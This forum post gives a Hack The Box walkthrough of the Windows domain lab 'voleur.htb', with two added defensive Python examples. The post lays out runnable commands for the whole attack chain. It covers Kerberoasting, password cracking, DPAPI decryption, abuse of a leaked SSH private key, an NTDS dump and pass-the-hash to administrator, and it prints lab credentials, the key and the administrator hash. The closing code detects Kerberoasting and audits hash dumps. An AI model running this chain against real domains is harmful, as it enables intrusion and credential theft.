HTB - VOLEUR.HTB - MEDIUM WINDOWS
by bitcoin - 07-07-25, 09:17 PM
#1
TARGET : VOLEUR.HTB,

I can provide my personal notes for the machine if anyone is interested.
 
Code:
IP: 10.10.11.76
Domain: voleur.htb
DC: dc.voleur.htb

Krb5.conf
 
Code:
[libdefaults]
  default_realm = VOLEUR.HTB
  dns_lookup_realm = false
  dns_lookup_kdc = false

[realms]
  VOLEUR.HTB = {
    kdc = dc.voleur.htb
  }

[domain_realm]
  .voleur.htb = VOLEUR.HTB
  voleur.htb   = VOLEUR.HTB

Initial TGT generation - ryan.naylor
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache

SMB enumeration
 
Code:
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"

Download encrypted Excel file
 
Code:
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT

Crack Excel password
 
Code:
office2john Access_Review.xlsx > xlsx.h
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txt

Result:
 
Code:
football1

Decrypt and extract credentials
 
Code:
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'

Extracted credentials:
 
Code:
Todd.Wolfe - Password was reset to NightT1meP1dg3on14 and account deleted
svc_ldap - P/W - M1XyC9pW7qT5Vn
svc_iis - P/W - N5pXyW1VqM7CZ8

Targeted Kerberoasting
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txt

Extracted TGS hash:
 
Code:
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$cf6535bc0a95a2ed7b815852807efa4a$... (remainder of hash truncated)

Crack TGS hash
 
Code:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txt

Result:
 
Code:
svc_winrm:AFireInsidedeOzarctica980219afi

WinRM access
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'
export KRB5CCNAME=FILE:svc_winrm.ccache
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

Restore deleted user Todd.Wolfe
 
Code:
$cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))
Import-Module ActiveDirectory
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential $cred | Restore-ADObject -Credential $cred
Get-ADUser todd.wolfe

Access Todd.Wolfe SMB share
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb

use IT
cd Second-Line Support
cd Archived Users
cd todd.wolfe

DPAPI credential extraction
Found DPAPI protected credentials in AppData/Roaming/Microsoft/

Extract masterkey:
 
Code:
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"

Masterkey result:
 
Code:
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Decrypt credentials:
 
Code:
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

DPAPI result:
 
Code:
Username: jeremy.combs Password: qT3V9pLXyN7W4m

Jeremy.combs access
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'
export KRB5CCNAME=FILE:jeremy.combs.ccache


evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (works, but is useless)


KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htb

SSH key discovery
Found in SMB share:

note.txt.txt:
 
Code:
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin

id_rsa:
 
Code:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

SSH access to svc_backup via WSL
 
Code:
chmod 400 id_rsa
ssh -p 2222 -i id_rsa svc_backup@voleur.htb

AD database extraction

Found in /mnt/c/IT/THIRD-LINE SUPPORT/:
 
Code:
./Active Directory: ntds.dit ntds.jfm
./registry: SECURITY SYSTEM

Extract NTLM hashes
 
Code:
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL

Administrator hash:
 
Code:
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::

Root access
 
Code:
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator
export KRB5CCNAME=FILE:administrator.ccache
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

Credentials summary
Code:
ryan.naylor:HollowOct31Nyt (Initial access)
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)
svc_ldap:M1XyC9pW7qT5Vn (Excel file)
svc_iis:N5pXyW1VqM7CZ8 (Excel file)
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)
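The targeted Kerberoast step in the post shows up on the DC side as a TGS request (Security event 4769) for a user-owned SPN with RC4 (etype 0x17) encryption. The following detection logic is an added example written from the defender's side; it is not code from the post or from any of the tools used in it. The 4769 records are constructed to mimic the event's EventData field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress), and the service name svc_sql is made up for the sample.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 data.

Added example, not part of the original post. The sample events are
constructed to resemble 4769 EventData fields; they are not real logs.
"""
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23: the type classic Kerberoast tooling asks for

# Constructed 4769 records. TargetUserName is the account that requested the
# ticket; ServiceName is the SPN owner the ticket was issued for.
SAMPLE_EVENTS = [
    {"TargetUserName": "ryan.naylor@VOLEUR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.76"},
    {"TargetUserName": "ryan.naylor@VOLEUR.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.11.76"},
    {"TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "svc_winrm",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "svc_sql",   # svc_sql is made up
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"TargetUserName": "svc_ldap@VOLEUR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
]


def parse_etype(value):
    """4769 writes the etype as a hex string such as '0x17'; accept decimal too."""
    value = value.strip().lower()
    return int(value, 16) if value.startswith("0x") else int(value)


def is_user_spn(service_name):
    """Machine accounts (trailing '$') and krbtgt have long random secrets and
    are not realistic offline-cracking targets; SPNs on user accounts are."""
    name = service_name.lower()
    return not name.endswith("$") and name != "krbtgt"


def kerberoast_hits(events):
    """Return (requester, service, source_ip) for each RC4 TGS request
    against a user-owned SPN."""
    hits = []
    for ev in events:
        if parse_etype(ev["TicketEncryptionType"]) != RC4_HMAC:
            continue
        if not is_user_spn(ev["ServiceName"]):
            continue
        hits.append((ev["TargetUserName"], ev["ServiceName"], ev["IpAddress"]))
    return hits


def services_per_requester(hits):
    """Distinct roastable SPNs requested per account: a high count in a short
    window is the sweep pattern, a count of 1 is the targeted pattern."""
    per = defaultdict(set)
    for requester, service, _ip in hits:
        per[requester].add(service)
    return {requester: len(services) for requester, services in per.items()}


if __name__ == "__main__":
    found = kerberoast_hits(SAMPLE_EVENTS)
    for requester, service, ip in found:
        print(f"RC4 TGS for user SPN {service} requested by {requester} from {ip}")
    print(services_per_requester(found))
```

Two of the five constructed events are flagged, both from svc_ldap. The RC4 request for DC$ is ignored on purpose: a machine account's key is not crackable offline, so alerting on it only adds noise. The durable mitigation is the one the filter hints at: set service accounts to AES-only (msDS-SupportedEncryptionTypes) and use long random passwords or gMSAs for anything that holds an SPN, so an RC4 request is either refused or yields nothing worth cracking.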
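The NTDS dump near the end of the post comes out in secretsdump.py's `user:rid:lmhash:nthash:::` line format. A defender who holds such a dump of their own domain (from a backup, or after an incident like the one this box models) usually wants three hygiene checks run over it before anything else: which accounts still store a real LM hash, which have an empty NT hash, and which share an NT hash with another account (password reuse). The audit below is an added example, not code from the post or from impacket; the dump it parses is constructed, with made-up RIDs and hashes.

```python
"""Audit an NTDS.dit dump in secretsdump.py's NTLM line format.

Added example, not part of the original post. SAMPLE_DUMP is constructed:
the RIDs and hashes are made up and are not the machine's.
"""
from collections import defaultdict

# Well-known hashes of the empty password. EMPTY_LM is also what a domain
# that no longer stores LM hashes shows for every account.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed secretsdump.py output, including the status lines it prints
# around the credential block and a domain-prefixed username.
SAMPLE_DUMP = "\n".join([
    "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "voleur.htb\\svc_ldap:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::",
    "voleur.htb\\svc_iis:1106:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::",
    "voleur.htb\\legacy.user:1107:a1b2c3d4e5f60718a1b2c3d4e5f60718:89abcdef0123456789abcdef01234567:::",
    "DC$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::",
    "[*] Cleaning up...",
])


def parse_secretsdump(text):
    """Keep only NTLM lines (they end in ':::'); skip status and Kerberos-key lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line.endswith(":::"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        records.append({
            "user": user.split("\\")[-1],  # drop a 'domain\' prefix if present
            "rid": int(rid),
            "lm": lm,
            "nt": nt,
            "machine": user.endswith("$"),
        })
    return records


def audit(records):
    """Return the three hygiene findings as lists/dicts of account names."""
    findings = {"lm_stored": [], "empty_nt": [], "shared_nt": {}}
    by_nt = defaultdict(list)
    for r in records:
        if r["lm"] != EMPTY_LM:
            findings["lm_stored"].append(r["user"])
        if r["nt"] == EMPTY_NT:
            findings["empty_nt"].append(r["user"])
        if not r["machine"]:  # machine passwords are random; reuse there is not meaningful
            by_nt[r["nt"]].append(r["user"])
    findings["shared_nt"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return findings


if __name__ == "__main__":
    result = audit(parse_secretsdump(SAMPLE_DUMP))
    print("accounts with a stored LM hash:", result["lm_stored"])
    print("accounts with an empty NT hash:", result["empty_nt"])
    for nt_hash, users in result["shared_nt"].items():
        print(f"NT hash {nt_hash[:8]}... shared by {users}")
```

On the constructed dump this reports legacy.user for a stored LM hash, Guest for an empty NT hash, and svc_ldap/svc_iis for a shared password. The same parser handles history lines (`user_history0:...`) unchanged, which is useful when checking whether a reset actually changed a compromised password rather than cycling back to an old one.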